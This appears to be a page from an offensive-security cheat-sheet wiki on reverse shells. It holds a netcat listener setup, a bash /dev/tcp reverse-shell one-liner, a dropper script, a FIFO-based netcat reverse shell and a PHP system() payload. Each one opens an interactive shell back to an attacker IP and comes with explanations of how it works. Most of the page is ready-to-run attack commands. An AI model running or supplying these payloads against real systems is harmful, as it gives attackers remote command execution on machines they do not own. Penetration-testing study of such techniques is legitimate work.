BASH

OCO

#setup listener
root@oco:~$ nc -lvnp {listeningPort}
 listening on [any] {listeningPort} ...

 * the -l represents listening mode; it waits for a connection from the target.
   the -v represents verbose mode
   the -n disables DNS resolution; this speeds up the connection.
   the -p {listeningPort} represents the port number to listen on
   
 * Netcat listens on all interfaces (0.0.0.0) by default

TARGET

BASH TCP REVERSE SHELL

#check if bash /dev/tcp is supported
root@target:~$ bash -c 'echo >/dev/tcp/127.0.0.1/80'
 * if /dev/tcp is supported, there should be no output or a connection error
 * if an error "No such file or directory" is displayed, it confirms that Bash was 
   compiled without /dev/tcp support
    - use the alternative method

root@target:~$ bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

DROPPER VERSION

this version wraps the command inside a script file, which can be uploaded or placed on the target, then run whenever needed

#
root@oco:~$ nano revShell.sh
 #!/bin/bash
 bash -i >& /dev/tcp/{attackerIP}/{attackerPort} 0>&1
 
 * this is an interactive shell where it keeps the connection open, allowing 
   for multiple commands to be sent and results to be returned in a more 
   dynamic way

TARGET: FIFO-BASED NETCAT REVERSE SHELL



root@oco:~$ #
root@target:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

 * this uses a named pipe for bi-directional communication; works even
   if /dev/tcp doesn’t exist
   
 * mkfifo /tmp/f creates a named pipe at /tmp/f
   cat /tmp/f | /bin/sh -i reads cmds from the pipe and feed them to the shell
   nc ... >/tmp/f is where netcat sends shell output back into the pipe which creates a
   two-way communication loop
   
 * the named pipe acts as a bridge between the shell and netcat, enabling full 
   interaction. a named pipe (also called a FIFO — First In, First Out) is a 
   special type of file used for inter-process communication (IPC) in Unix-like systems.
   unlike a regular pipe (|) which connects processes in the same shell session, a 
   named pipe exists on the filesystem, so unrelated processes can communicate 
   through it as long as they both have access to the pipe file.

SCRIPT

#
root@oco:~$ 
 <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

PreviousREVERSE SHELL NextBASH W/ PHP WRAPPER

Last updated 6 months ago